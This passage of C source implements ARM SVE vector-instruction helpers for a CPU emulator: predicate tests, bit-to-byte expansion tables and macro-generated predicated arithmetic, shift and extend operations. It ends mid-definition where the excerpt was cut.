/* This is an iterative function, called for each Pd and Pg word
 * moving forward.
 */
static uint32_t iter_predtest_fwd(uint64_t d, uint64_t g, uint32_t flags)
{
    if (likely(g)) {
        /* Compute N from first D & G.
           Use bit 2 to signal first G bit seen. */
        if (!(flags & 4)) {
#ifdef _MSC_VER
            flags |= ((d & (g & (0 - g))) != 0) << 31;
#else
            flags |= ((d & (g & -g)) != 0) << 31;
#endif
            flags |= 4;
        }

        /* Accumulate Z from each D & G. */
        flags |= ((d & g) != 0) << 1;

        /* Compute C from last !(D & G). Replace previous. */
        flags = deposit32(flags, 0, 1, (d & pow2floor(g)) == 0);
    }
    return flags;
}

/* This is an iterative function, called for each Pd and Pg word
 * moving backward.
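 *
 * Both directions produce the same final flags; e.g. for a single
 * word with d = 0x01 and g = 0xff, the first active element (bit 0)
 * is true, so N is set; not every active element is false, so Z is
 * clear; and the last active element (bit 7) is false, so C is set.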
*/ static uint32_t iter_predtest_bwd(uint64_t d, uint64_t g, uint32_t flags) { if (likely(g)) { /* Compute C from first (i.e last) !(D & G). Use bit 2 to signal first G bit seen. */ if (!(flags & 4)) { flags += 4 - 1; /* add bit 2, subtract C from PREDTEST_INIT */ flags |= (d & pow2floor(g)) == 0; } /* Accumulate Z from each D & G. */ flags |= ((d & g) != 0) << 1; /* Compute N from last (i.e first) D & G. Replace previous. */ #ifdef _MSC_VER flags = deposit32(flags, 31, 1, (d & (g & (0 - g))) != 0); #else flags = deposit32(flags, 31, 1, (d & (g & -g)) != 0); #endif } return flags; } /* The same for a single word predicate. */ uint32_t HELPER(sve_predtest1)(uint64_t d, uint64_t g) { return iter_predtest_fwd(d, g, PREDTEST_INIT); } /* The same for a multi-word predicate. */ uint32_t HELPER(sve_predtest)(void *vd, void *vg, uint32_t words) { uint32_t flags = PREDTEST_INIT; uint64_t *d = vd, *g = vg; uintptr_t i = 0; do { flags = iter_predtest_fwd(d[i], g[i], flags); } while (++i < words); return flags; } /* Expand active predicate bits to bytes, for byte elements. * for (i = 0; i < 256; ++i) { * unsigned long m = 0; * for (j = 0; j < 8; j++) { * if ((i >> j) & 1) { * m |= 0xfful << (j << 3); * } * } * printf("0x%016lx,\n", m); * } */ static inline uint64_t expand_pred_b(uint8_t byte) { static const uint64_t word[256] = { 0x0000000000000000, 0x00000000000000ff, 0x000000000000ff00, 0x000000000000ffff, 0x0000000000ff0000, 0x0000000000ff00ff, 0x0000000000ffff00, 0x0000000000ffffff, 0x00000000ff000000, 0x00000000ff0000ff, 0x00000000ff00ff00, 0x00000000ff00ffff, 0x00000000ffff0000, 0x00000000ffff00ff, 0x00000000ffffff00, 0x00000000ffffffff, 0x000000ff00000000, 0x000000ff000000ff, 0x000000ff0000ff00, 0x000000ff0000ffff, 0x000000ff00ff0000, 0x000000ff00ff00ff, 0x000000ff00ffff00, 0x000000ff00ffffff, 0x000000ffff000000, 0x000000ffff0000ff, 0x000000ffff00ff00, 0x000000ffff00ffff, 0x000000ffffff0000, 0x000000ffffff00ff, 0x000000ffffffff00, 0x000000ffffffffff, 0x0000ff0000000000, 0x0000ff00000000ff, 0x0000ff000000ff00, 0x0000ff000000ffff, 0x0000ff0000ff0000, 0x0000ff0000ff00ff, 0x0000ff0000ffff00, 0x0000ff0000ffffff, 0x0000ff00ff000000, 0x0000ff00ff0000ff, 0x0000ff00ff00ff00, 0x0000ff00ff00ffff, 0x0000ff00ffff0000, 0x0000ff00ffff00ff, 0x0000ff00ffffff00, 0x0000ff00ffffffff, 0x0000ffff00000000, 0x0000ffff000000ff, 0x0000ffff0000ff00, 0x0000ffff0000ffff, 0x0000ffff00ff0000, 0x0000ffff00ff00ff, 0x0000ffff00ffff00, 0x0000ffff00ffffff, 0x0000ffffff000000, 0x0000ffffff0000ff, 0x0000ffffff00ff00, 0x0000ffffff00ffff, 0x0000ffffffff0000, 0x0000ffffffff00ff, 0x0000ffffffffff00, 0x0000ffffffffffff, 0x00ff000000000000, 0x00ff0000000000ff, 0x00ff00000000ff00, 0x00ff00000000ffff, 0x00ff000000ff0000, 0x00ff000000ff00ff, 0x00ff000000ffff00, 0x00ff000000ffffff, 0x00ff0000ff000000, 0x00ff0000ff0000ff, 0x00ff0000ff00ff00, 0x00ff0000ff00ffff, 0x00ff0000ffff0000, 0x00ff0000ffff00ff, 0x00ff0000ffffff00, 0x00ff0000ffffffff, 0x00ff00ff00000000, 0x00ff00ff000000ff, 0x00ff00ff0000ff00, 0x00ff00ff0000ffff, 0x00ff00ff00ff0000, 0x00ff00ff00ff00ff, 0x00ff00ff00ffff00, 0x00ff00ff00ffffff, 0x00ff00ffff000000, 0x00ff00ffff0000ff, 0x00ff00ffff00ff00, 0x00ff00ffff00ffff, 0x00ff00ffffff0000, 0x00ff00ffffff00ff, 0x00ff00ffffffff00, 0x00ff00ffffffffff, 0x00ffff0000000000, 0x00ffff00000000ff, 0x00ffff000000ff00, 0x00ffff000000ffff, 0x00ffff0000ff0000, 0x00ffff0000ff00ff, 0x00ffff0000ffff00, 0x00ffff0000ffffff, 0x00ffff00ff000000, 0x00ffff00ff0000ff, 0x00ffff00ff00ff00, 0x00ffff00ff00ffff, 0x00ffff00ffff0000, 0x00ffff00ffff00ff, 
0x00ffff00ffffff00, 0x00ffff00ffffffff, 0x00ffffff00000000, 0x00ffffff000000ff, 0x00ffffff0000ff00, 0x00ffffff0000ffff, 0x00ffffff00ff0000, 0x00ffffff00ff00ff, 0x00ffffff00ffff00, 0x00ffffff00ffffff, 0x00ffffffff000000, 0x00ffffffff0000ff, 0x00ffffffff00ff00, 0x00ffffffff00ffff, 0x00ffffffffff0000, 0x00ffffffffff00ff, 0x00ffffffffffff00, 0x00ffffffffffffff, 0xff00000000000000, 0xff000000000000ff, 0xff0000000000ff00, 0xff0000000000ffff, 0xff00000000ff0000, 0xff00000000ff00ff, 0xff00000000ffff00, 0xff00000000ffffff, 0xff000000ff000000, 0xff000000ff0000ff, 0xff000000ff00ff00, 0xff000000ff00ffff, 0xff000000ffff0000, 0xff000000ffff00ff, 0xff000000ffffff00, 0xff000000ffffffff, 0xff0000ff00000000, 0xff0000ff000000ff, 0xff0000ff0000ff00, 0xff0000ff0000ffff, 0xff0000ff00ff0000, 0xff0000ff00ff00ff, 0xff0000ff00ffff00, 0xff0000ff00ffffff, 0xff0000ffff000000, 0xff0000ffff0000ff, 0xff0000ffff00ff00, 0xff0000ffff00ffff, 0xff0000ffffff0000, 0xff0000ffffff00ff, 0xff0000ffffffff00, 0xff0000ffffffffff, 0xff00ff0000000000, 0xff00ff00000000ff, 0xff00ff000000ff00, 0xff00ff000000ffff, 0xff00ff0000ff0000, 0xff00ff0000ff00ff, 0xff00ff0000ffff00, 0xff00ff0000ffffff, 0xff00ff00ff000000, 0xff00ff00ff0000ff, 0xff00ff00ff00ff00, 0xff00ff00ff00ffff, 0xff00ff00ffff0000, 0xff00ff00ffff00ff, 0xff00ff00ffffff00, 0xff00ff00ffffffff, 0xff00ffff00000000, 0xff00ffff000000ff, 0xff00ffff0000ff00, 0xff00ffff0000ffff, 0xff00ffff00ff0000, 0xff00ffff00ff00ff, 0xff00ffff00ffff00, 0xff00ffff00ffffff, 0xff00ffffff000000, 0xff00ffffff0000ff, 0xff00ffffff00ff00, 0xff00ffffff00ffff, 0xff00ffffffff0000, 0xff00ffffffff00ff, 0xff00ffffffffff00, 0xff00ffffffffffff, 0xffff000000000000, 0xffff0000000000ff, 0xffff00000000ff00, 0xffff00000000ffff, 0xffff000000ff0000, 0xffff000000ff00ff, 0xffff000000ffff00, 0xffff000000ffffff, 0xffff0000ff000000, 0xffff0000ff0000ff, 0xffff0000ff00ff00, 0xffff0000ff00ffff, 0xffff0000ffff0000, 0xffff0000ffff00ff, 0xffff0000ffffff00, 0xffff0000ffffffff, 0xffff00ff00000000, 0xffff00ff000000ff, 0xffff00ff0000ff00, 0xffff00ff0000ffff, 0xffff00ff00ff0000, 0xffff00ff00ff00ff, 0xffff00ff00ffff00, 0xffff00ff00ffffff, 0xffff00ffff000000, 0xffff00ffff0000ff, 0xffff00ffff00ff00, 0xffff00ffff00ffff, 0xffff00ffffff0000, 0xffff00ffffff00ff, 0xffff00ffffffff00, 0xffff00ffffffffff, 0xffffff0000000000, 0xffffff00000000ff, 0xffffff000000ff00, 0xffffff000000ffff, 0xffffff0000ff0000, 0xffffff0000ff00ff, 0xffffff0000ffff00, 0xffffff0000ffffff, 0xffffff00ff000000, 0xffffff00ff0000ff, 0xffffff00ff00ff00, 0xffffff00ff00ffff, 0xffffff00ffff0000, 0xffffff00ffff00ff, 0xffffff00ffffff00, 0xffffff00ffffffff, 0xffffffff00000000, 0xffffffff000000ff, 0xffffffff0000ff00, 0xffffffff0000ffff, 0xffffffff00ff0000, 0xffffffff00ff00ff, 0xffffffff00ffff00, 0xffffffff00ffffff, 0xffffffffff000000, 0xffffffffff0000ff, 0xffffffffff00ff00, 0xffffffffff00ffff, 0xffffffffffff0000, 0xffffffffffff00ff, 0xffffffffffffff00, 0xffffffffffffffff, }; return word[byte]; } /* Similarly for half-word elements. 
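 * Only the even-numbered predicate bits are significant for 16-bit
 * elements, hence the i & 0xaa skip in the generator below and the
 * byte & 0x55 mask at lookup time.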
* for (i = 0; i < 256; ++i) { * unsigned long m = 0; * if (i & 0xaa) { * continue; * } * for (j = 0; j < 8; j += 2) { * if ((i >> j) & 1) { * m |= 0xfffful << (j << 3); * } * } * printf("[0x%x] = 0x%016lx,\n", i, m); * } */ static inline uint64_t expand_pred_h(uint8_t byte) { static const uint64_t word[] = { [0x01] = 0x000000000000ffff, [0x04] = 0x00000000ffff0000, [0x05] = 0x00000000ffffffff, [0x10] = 0x0000ffff00000000, [0x11] = 0x0000ffff0000ffff, [0x14] = 0x0000ffffffff0000, [0x15] = 0x0000ffffffffffff, [0x40] = 0xffff000000000000, [0x41] = 0xffff00000000ffff, [0x44] = 0xffff0000ffff0000, [0x45] = 0xffff0000ffffffff, [0x50] = 0xffffffff00000000, [0x51] = 0xffffffff0000ffff, [0x54] = 0xffffffffffff0000, [0x55] = 0xffffffffffffffff, }; return word[byte & 0x55]; } /* Similarly for single word elements. */ static inline uint64_t expand_pred_s(uint8_t byte) { static const uint64_t word[] = { [0x01] = 0x00000000ffffffffull, [0x10] = 0xffffffff00000000ull, [0x11] = 0xffffffffffffffffull, }; return word[byte & 0x11]; } /* Swap 16-bit words within a 32-bit word. */ static inline uint32_t hswap32(uint32_t h) { return rol32(h, 16); } /* Swap 16-bit words within a 64-bit word. */ static inline uint64_t hswap64(uint64_t h) { uint64_t m = 0x0000ffff0000ffffull; h = rol64(h, 32); return ((h & m) << 16) | ((h >> 16) & m); } /* Swap 32-bit words within a 64-bit word. */ static inline uint64_t wswap64(uint64_t h) { return rol64(h, 32); } #define LOGICAL_PPPP(NAME, FUNC) \ void HELPER(NAME)(void *vd, void *vn, void *vm, void *vg, uint32_t desc) \ { \ uintptr_t opr_sz = simd_oprsz(desc); \ uint64_t *d = vd, *n = vn, *m = vm, *g = vg; \ uintptr_t i; \ for (i = 0; i < opr_sz / 8; ++i) { \ d[i] = FUNC(n[i], m[i], g[i]); \ } \ } #define DO_AND(N, M, G) (((N) & (M)) & (G)) #define DO_BIC(N, M, G) (((N) & ~(M)) & (G)) #define DO_EOR(N, M, G) (((N) ^ (M)) & (G)) #define DO_ORR(N, M, G) (((N) | (M)) & (G)) #define DO_ORN(N, M, G) (((N) | ~(M)) & (G)) #define DO_NOR(N, M, G) (~((N) | (M)) & (G)) #define DO_NAND(N, M, G) (~((N) & (M)) & (G)) #define DO_SEL(N, M, G) (((N) & (G)) | ((M) & ~(G))) LOGICAL_PPPP(sve_and_pppp, DO_AND) LOGICAL_PPPP(sve_bic_pppp, DO_BIC) LOGICAL_PPPP(sve_eor_pppp, DO_EOR) LOGICAL_PPPP(sve_sel_pppp, DO_SEL) LOGICAL_PPPP(sve_orr_pppp, DO_ORR) LOGICAL_PPPP(sve_orn_pppp, DO_ORN) LOGICAL_PPPP(sve_nor_pppp, DO_NOR) LOGICAL_PPPP(sve_nand_pppp, DO_NAND) #undef DO_AND #undef DO_BIC #undef DO_EOR #undef DO_ORR #undef DO_ORN #undef DO_NOR #undef DO_NAND #undef DO_SEL #undef LOGICAL_PPPP /* Fully general three-operand expander, controlled by a predicate. * This is complicated by the host-endian storage of the register file. */ /* ??? I don't expect the compiler could ever vectorize this itself. * With some tables we can convert bit masks to byte masks, and with * extra care wrt byte/word ordering we could use gcc generic vectors * and do 16 bytes at a time. */ #define DO_ZPZZ(NAME, TYPE, H, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vm, void *vg, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc); \ for (i = 0; i < opr_sz; ) { \ uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); \ do { \ if (pg & 1) { \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ TYPE mm = *(TYPE *)((char *)vm + H(i)); \ *(TYPE *)((char *)vd + H(i)) = OP(nn, mm); \ } \ i += sizeof(TYPE), pg >>= sizeof(TYPE); \ } while (i & 15); \ } \ } /* Similarly, specialized for 64-bit operands. 
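 *
 * For reference, the predicated expansion above, e.g.
 * DO_ZPZZ(sve_add_zpzz_b, uint8_t, H1, DO_ADD), produces roughly
 *
 *   void helper_sve_add_zpzz_b(void *vd, void *vn, void *vm,
 *                              void *vg, uint32_t desc)
 *   {
 *       // consume 16 predicate bits per 16 bytes of vector,
 *       // writing only lanes whose predicate bit is set
 *   }
 *
 * whereas the 64-bit form below tests one predicate byte per element
 * and needs no inner loop.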
*/ #define DO_ZPZZ_D(NAME, TYPE, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vm, void *vg, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc) / 8; \ TYPE *d = vd, *n = vn, *m = vm; \ uint8_t *pg = vg; \ for (i = 0; i < opr_sz; i += 1) { \ if (pg[H1(i)] & 1) { \ TYPE nn = n[i], mm = m[i]; \ d[i] = OP(nn, mm); \ } \ } \ } #define DO_AND(N, M) (N & M) #define DO_EOR(N, M) (N ^ M) #define DO_ORR(N, M) (N | M) #define DO_BIC(N, M) (N & ~M) #define DO_ADD(N, M) (N + M) #define DO_SUB(N, M) (N - M) #define DO_MAX(N, M) ((N) >= (M) ? (N) : (M)) #define DO_MIN(N, M) ((N) >= (M) ? (M) : (N)) #define DO_ABD(N, M) ((N) >= (M) ? (N) - (M) : (M) - (N)) #define DO_MUL(N, M) (N * M) /* * We must avoid the C undefined behaviour cases: division by * zero and signed division of INT_MIN by -1. Both of these * have architecturally defined required results for Arm. * We special case all signed divisions by -1 to avoid having * to deduce the minimum integer for the type involved. */ #define DO_SDIV(N, M) (unlikely(M == 0) ? 0 : unlikely(M == -1) ? -N : N / M) #define DO_UDIV(N, M) (unlikely(M == 0) ? 0 : N / M) DO_ZPZZ(sve_and_zpzz_b, uint8_t, H1, DO_AND) DO_ZPZZ(sve_and_zpzz_h, uint16_t, H1_2, DO_AND) DO_ZPZZ(sve_and_zpzz_s, uint32_t, H1_4, DO_AND) DO_ZPZZ_D(sve_and_zpzz_d, uint64_t, DO_AND) DO_ZPZZ(sve_orr_zpzz_b, uint8_t, H1, DO_ORR) DO_ZPZZ(sve_orr_zpzz_h, uint16_t, H1_2, DO_ORR) DO_ZPZZ(sve_orr_zpzz_s, uint32_t, H1_4, DO_ORR) DO_ZPZZ_D(sve_orr_zpzz_d, uint64_t, DO_ORR) DO_ZPZZ(sve_eor_zpzz_b, uint8_t, H1, DO_EOR) DO_ZPZZ(sve_eor_zpzz_h, uint16_t, H1_2, DO_EOR) DO_ZPZZ(sve_eor_zpzz_s, uint32_t, H1_4, DO_EOR) DO_ZPZZ_D(sve_eor_zpzz_d, uint64_t, DO_EOR) DO_ZPZZ(sve_bic_zpzz_b, uint8_t, H1, DO_BIC) DO_ZPZZ(sve_bic_zpzz_h, uint16_t, H1_2, DO_BIC) DO_ZPZZ(sve_bic_zpzz_s, uint32_t, H1_4, DO_BIC) DO_ZPZZ_D(sve_bic_zpzz_d, uint64_t, DO_BIC) DO_ZPZZ(sve_add_zpzz_b, uint8_t, H1, DO_ADD) DO_ZPZZ(sve_add_zpzz_h, uint16_t, H1_2, DO_ADD) DO_ZPZZ(sve_add_zpzz_s, uint32_t, H1_4, DO_ADD) DO_ZPZZ_D(sve_add_zpzz_d, uint64_t, DO_ADD) DO_ZPZZ(sve_sub_zpzz_b, uint8_t, H1, DO_SUB) DO_ZPZZ(sve_sub_zpzz_h, uint16_t, H1_2, DO_SUB) DO_ZPZZ(sve_sub_zpzz_s, uint32_t, H1_4, DO_SUB) DO_ZPZZ_D(sve_sub_zpzz_d, uint64_t, DO_SUB) DO_ZPZZ(sve_smax_zpzz_b, int8_t, H1, DO_MAX) DO_ZPZZ(sve_smax_zpzz_h, int16_t, H1_2, DO_MAX) DO_ZPZZ(sve_smax_zpzz_s, int32_t, H1_4, DO_MAX) DO_ZPZZ_D(sve_smax_zpzz_d, int64_t, DO_MAX) DO_ZPZZ(sve_umax_zpzz_b, uint8_t, H1, DO_MAX) DO_ZPZZ(sve_umax_zpzz_h, uint16_t, H1_2, DO_MAX) DO_ZPZZ(sve_umax_zpzz_s, uint32_t, H1_4, DO_MAX) DO_ZPZZ_D(sve_umax_zpzz_d, uint64_t, DO_MAX) DO_ZPZZ(sve_smin_zpzz_b, int8_t, H1, DO_MIN) DO_ZPZZ(sve_smin_zpzz_h, int16_t, H1_2, DO_MIN) DO_ZPZZ(sve_smin_zpzz_s, int32_t, H1_4, DO_MIN) DO_ZPZZ_D(sve_smin_zpzz_d, int64_t, DO_MIN) DO_ZPZZ(sve_umin_zpzz_b, uint8_t, H1, DO_MIN) DO_ZPZZ(sve_umin_zpzz_h, uint16_t, H1_2, DO_MIN) DO_ZPZZ(sve_umin_zpzz_s, uint32_t, H1_4, DO_MIN) DO_ZPZZ_D(sve_umin_zpzz_d, uint64_t, DO_MIN) DO_ZPZZ(sve_sabd_zpzz_b, int8_t, H1, DO_ABD) DO_ZPZZ(sve_sabd_zpzz_h, int16_t, H1_2, DO_ABD) DO_ZPZZ(sve_sabd_zpzz_s, int32_t, H1_4, DO_ABD) DO_ZPZZ_D(sve_sabd_zpzz_d, int64_t, DO_ABD) DO_ZPZZ(sve_uabd_zpzz_b, uint8_t, H1, DO_ABD) DO_ZPZZ(sve_uabd_zpzz_h, uint16_t, H1_2, DO_ABD) DO_ZPZZ(sve_uabd_zpzz_s, uint32_t, H1_4, DO_ABD) DO_ZPZZ_D(sve_uabd_zpzz_d, uint64_t, DO_ABD) /* Because the computation type is at least twice as large as required, these work for both signed and unsigned source types. 
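 *
 * E.g. do_mulh_b() below is shared by sve_smulh_zpzz_b and
 * sve_umulh_zpzz_b: the caller's TYPE (int8_t vs uint8_t) decides how
 * each lane is widened, and the int32_t product is exact either way,
 * so (-128) * (-128) and 128u * 128u both give 16384, high byte 0x40.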
*/ static inline uint8_t do_mulh_b(int32_t n, int32_t m) { return (n * m) >> 8; } static inline uint16_t do_mulh_h(int32_t n, int32_t m) { return (n * m) >> 16; } static inline uint32_t do_mulh_s(int64_t n, int64_t m) { return (n * m) >> 32; } static inline uint64_t do_smulh_d(uint64_t n, uint64_t m) { uint64_t lo, hi; muls64(&lo, &hi, n, m); return hi; } static inline uint64_t do_umulh_d(uint64_t n, uint64_t m) { uint64_t lo, hi; mulu64(&lo, &hi, n, m); return hi; } DO_ZPZZ(sve_mul_zpzz_b, uint8_t, H1, DO_MUL) DO_ZPZZ(sve_mul_zpzz_h, uint16_t, H1_2, DO_MUL) DO_ZPZZ(sve_mul_zpzz_s, uint32_t, H1_4, DO_MUL) DO_ZPZZ_D(sve_mul_zpzz_d, uint64_t, DO_MUL) DO_ZPZZ(sve_smulh_zpzz_b, int8_t, H1, do_mulh_b) DO_ZPZZ(sve_smulh_zpzz_h, int16_t, H1_2, do_mulh_h) DO_ZPZZ(sve_smulh_zpzz_s, int32_t, H1_4, do_mulh_s) DO_ZPZZ_D(sve_smulh_zpzz_d, uint64_t, do_smulh_d) DO_ZPZZ(sve_umulh_zpzz_b, uint8_t, H1, do_mulh_b) DO_ZPZZ(sve_umulh_zpzz_h, uint16_t, H1_2, do_mulh_h) DO_ZPZZ(sve_umulh_zpzz_s, uint32_t, H1_4, do_mulh_s) DO_ZPZZ_D(sve_umulh_zpzz_d, uint64_t, do_umulh_d) DO_ZPZZ(sve_sdiv_zpzz_s, int32_t, H1_4, DO_SDIV) DO_ZPZZ_D(sve_sdiv_zpzz_d, int64_t, DO_SDIV) DO_ZPZZ(sve_udiv_zpzz_s, uint32_t, H1_4, DO_UDIV) DO_ZPZZ_D(sve_udiv_zpzz_d, uint64_t, DO_UDIV) /* Note that all bits of the shift are significant and not modulo the element size. */ #define DO_ASR(N, M) (N >> MIN(M, sizeof(N) * 8 - 1)) #define DO_LSR(N, M) (M < sizeof(N) * 8 ? N >> M : 0) #define DO_LSL(N, M) (M < sizeof(N) * 8 ? N << M : 0) DO_ZPZZ(sve_asr_zpzz_b, int8_t, H1, DO_ASR) DO_ZPZZ(sve_lsr_zpzz_b, uint8_t, H1_2, DO_LSR) DO_ZPZZ(sve_lsl_zpzz_b, uint8_t, H1_4, DO_LSL) DO_ZPZZ(sve_asr_zpzz_h, int16_t, H1, DO_ASR) DO_ZPZZ(sve_lsr_zpzz_h, uint16_t, H1_2, DO_LSR) DO_ZPZZ(sve_lsl_zpzz_h, uint16_t, H1_4, DO_LSL) DO_ZPZZ(sve_asr_zpzz_s, int32_t, H1, DO_ASR) DO_ZPZZ(sve_lsr_zpzz_s, uint32_t, H1_2, DO_LSR) DO_ZPZZ(sve_lsl_zpzz_s, uint32_t, H1_4, DO_LSL) DO_ZPZZ_D(sve_asr_zpzz_d, int64_t, DO_ASR) DO_ZPZZ_D(sve_lsr_zpzz_d, uint64_t, DO_LSR) DO_ZPZZ_D(sve_lsl_zpzz_d, uint64_t, DO_LSL) #undef DO_ZPZZ #undef DO_ZPZZ_D /* Three-operand expander, controlled by a predicate, in which the * third operand is "wide". That is, for D = N op M, the same 64-bit * value of M is used with all of the narrower values of N. */ #define DO_ZPZW(NAME, TYPE, TYPEW, H, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vm, void *vg, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc); \ for (i = 0; i < opr_sz; ) { \ uint8_t pg = *(uint8_t *)((char *)vg + H1(i >> 3)); \ TYPEW mm = *(TYPEW *)((char *)vm + i); \ do { \ if (pg & 1) { \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ *(TYPE *)((char *)vd + H(i)) = OP(nn, mm); \ } \ i += sizeof(TYPE), pg >>= sizeof(TYPE); \ } while (i & 7); \ } \ } DO_ZPZW(sve_asr_zpzw_b, int8_t, uint64_t, H1, DO_ASR) DO_ZPZW(sve_lsr_zpzw_b, uint8_t, uint64_t, H1, DO_LSR) DO_ZPZW(sve_lsl_zpzw_b, uint8_t, uint64_t, H1, DO_LSL) DO_ZPZW(sve_asr_zpzw_h, int16_t, uint64_t, H1_2, DO_ASR) DO_ZPZW(sve_lsr_zpzw_h, uint16_t, uint64_t, H1_2, DO_LSR) DO_ZPZW(sve_lsl_zpzw_h, uint16_t, uint64_t, H1_2, DO_LSL) DO_ZPZW(sve_asr_zpzw_s, int32_t, uint64_t, H1_4, DO_ASR) DO_ZPZW(sve_lsr_zpzw_s, uint32_t, uint64_t, H1_4, DO_LSR) DO_ZPZW(sve_lsl_zpzw_s, uint32_t, uint64_t, H1_4, DO_LSL) #undef DO_ZPZW /* Fully general two-operand expander, controlled by a predicate. 
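 *
 * As with the three-operand form, the predicate is consumed sixteen
 * bits at a time and shifted by the element size per lane, so for
 * 32-bit elements only every fourth predicate bit is examined:
 *
 *   i += sizeof(TYPE), pg >>= sizeof(TYPE);  // 4 bits per .s lane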
*/ #define DO_ZPZ(NAME, TYPE, H, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vg, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc); \ for (i = 0; i < opr_sz; ) { \ uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); \ do { \ if (pg & 1) { \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ *(TYPE *)((char *)vd + H(i)) = OP(nn); \ } \ i += sizeof(TYPE), pg >>= sizeof(TYPE); \ } while (i & 15); \ } \ } /* Similarly, specialized for 64-bit operands. */ #define DO_ZPZ_D(NAME, TYPE, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vg, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc) / 8; \ TYPE *d = vd, *n = vn; \ uint8_t *pg = vg; \ for (i = 0; i < opr_sz; i += 1) { \ if (pg[H1(i)] & 1) { \ TYPE nn = n[i]; \ d[i] = OP(nn); \ } \ } \ } #define DO_CLS_B(N) (clrsb32(N) - 24) #define DO_CLS_H(N) (clrsb32(N) - 16) DO_ZPZ(sve_cls_b, int8_t, H1, DO_CLS_B) DO_ZPZ(sve_cls_h, int16_t, H1_2, DO_CLS_H) DO_ZPZ(sve_cls_s, int32_t, H1_4, clrsb32) DO_ZPZ_D(sve_cls_d, int64_t, clrsb64) #define DO_CLZ_B(N) (clz32(N) - 24) #define DO_CLZ_H(N) (clz32(N) - 16) DO_ZPZ(sve_clz_b, uint8_t, H1, DO_CLZ_B) DO_ZPZ(sve_clz_h, uint16_t, H1_2, DO_CLZ_H) DO_ZPZ(sve_clz_s, uint32_t, H1_4, clz32) DO_ZPZ_D(sve_clz_d, uint64_t, clz64) DO_ZPZ(sve_cnt_zpz_b, uint8_t, H1, ctpop8) DO_ZPZ(sve_cnt_zpz_h, uint16_t, H1_2, ctpop16) DO_ZPZ(sve_cnt_zpz_s, uint32_t, H1_4, ctpop32) DO_ZPZ_D(sve_cnt_zpz_d, uint64_t, ctpop64) #define DO_CNOT(N) (N == 0) DO_ZPZ(sve_cnot_b, uint8_t, H1, DO_CNOT) DO_ZPZ(sve_cnot_h, uint16_t, H1_2, DO_CNOT) DO_ZPZ(sve_cnot_s, uint32_t, H1_4, DO_CNOT) DO_ZPZ_D(sve_cnot_d, uint64_t, DO_CNOT) #ifdef _MSC_VER #define DO_FABS16(N) (N & ((uint16_t)-1 >> 1)) #define DO_FABS32(N) (N & ((uint32_t)-1 >> 1)) #define DO_FABS64(N) (N & ((uint64_t)-1 >> 1)) DO_ZPZ(sve_fabs_h, uint16_t, H1_2, DO_FABS16) DO_ZPZ(sve_fabs_s, uint32_t, H1_4, DO_FABS32) DO_ZPZ_D(sve_fabs_d, uint64_t, DO_FABS64) #else #define DO_FABS(N) (N & ((__typeof(N))-1 >> 1)) DO_ZPZ(sve_fabs_h, uint16_t, H1_2, DO_FABS) DO_ZPZ(sve_fabs_s, uint32_t, H1_4, DO_FABS) DO_ZPZ_D(sve_fabs_d, uint64_t, DO_FABS) #endif #ifdef _MSC_VER #define DO_FNEG16(N) (N ^ ~((uint16_t)-1 >> 1)) #define DO_FNEG32(N) (N ^ ~((uint32_t)-1 >> 1)) #define DO_FNEG64(N) (N ^ ~((uint64_t)-1 >> 1)) DO_ZPZ(sve_fneg_h, uint16_t, H1_2, DO_FNEG16) DO_ZPZ(sve_fneg_s, uint32_t, H1_4, DO_FNEG32) DO_ZPZ_D(sve_fneg_d, uint64_t, DO_FNEG64) #else #define DO_FNEG(N) (N ^ ~((__typeof(N))-1 >> 1)) DO_ZPZ(sve_fneg_h, uint16_t, H1_2, DO_FNEG) DO_ZPZ(sve_fneg_s, uint32_t, H1_4, DO_FNEG) DO_ZPZ_D(sve_fneg_d, uint64_t, DO_FNEG) #endif #define DO_NOT(N) (~N) DO_ZPZ(sve_not_zpz_b, uint8_t, H1, DO_NOT) DO_ZPZ(sve_not_zpz_h, uint16_t, H1_2, DO_NOT) DO_ZPZ(sve_not_zpz_s, uint32_t, H1_4, DO_NOT) DO_ZPZ_D(sve_not_zpz_d, uint64_t, DO_NOT) #define DO_SXTB(N) ((int8_t)N) #define DO_SXTH(N) ((int16_t)N) #define DO_SXTS(N) ((int32_t)N) #define DO_UXTB(N) ((uint8_t)N) #define DO_UXTH(N) ((uint16_t)N) #define DO_UXTS(N) ((uint32_t)N) DO_ZPZ(sve_sxtb_h, uint16_t, H1_2, DO_SXTB) DO_ZPZ(sve_sxtb_s, uint32_t, H1_4, DO_SXTB) DO_ZPZ(sve_sxth_s, uint32_t, H1_4, DO_SXTH) DO_ZPZ_D(sve_sxtb_d, uint64_t, DO_SXTB) DO_ZPZ_D(sve_sxth_d, uint64_t, DO_SXTH) DO_ZPZ_D(sve_sxtw_d, uint64_t, DO_SXTS) DO_ZPZ(sve_uxtb_h, uint16_t, H1_2, DO_UXTB) DO_ZPZ(sve_uxtb_s, uint32_t, H1_4, DO_UXTB) DO_ZPZ(sve_uxth_s, uint32_t, H1_4, DO_UXTH) DO_ZPZ_D(sve_uxtb_d, uint64_t, DO_UXTB) DO_ZPZ_D(sve_uxth_d, uint64_t, DO_UXTH) DO_ZPZ_D(sve_uxtw_d, uint64_t, DO_UXTS) #ifdef _MSC_VER #define DO_ABS(N) (N < 0 ? 
